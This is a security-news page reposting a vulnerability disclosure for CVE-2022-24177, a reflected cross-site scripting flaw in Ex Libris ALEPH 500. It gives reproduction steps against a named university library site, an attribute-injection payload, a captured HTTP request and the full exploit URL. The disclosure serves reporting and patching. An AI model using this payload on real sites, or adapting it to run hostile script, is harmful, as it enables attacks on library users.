Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-24177: Ex libris_xss vulnerability · Issue #1 · zhao1231/cve_payload

A cross-site scripting (XSS) vulnerability in the component cgi-bin/ej.cgi of Ex libris ALEPH 500 v18.1 and v20 allows attackers to execute arbitrary web scripts or HTML.

CVE
#xss#vulnerability#web#google#git

1 we can search Wuhan University Library on Google and click
企业微信截图_16443782227933
2 then we click the E-journals of Resources
image
3 we click the search,then we can jump to new page
image
4 enter payload in the search box : 12345" onmousemove="console.log(123)
click the search box,then move the mouse over the search box,we can see log in the console
image
5 there is the data package of burpsuite
企业微信截图_1644385957881
GET /cgi-bin/ej.cgi?s=12345%22+onmousemove%3D%22console.log%28123%29&x=16&y=12&typ=0&lang=0 HTTP/1.1
Host: sfx.lib.whu.edu.cn
User-Agent: R0VrgaJmaBRV
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Full URL of this vulnerability is :
http://sfx.lib.whu.edu.cn/cgi-bin/ej.cgi?s=12345%22+onmousemove%3D%22console.log%28123%29&x=16&y=12&typ=0&lang=0

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907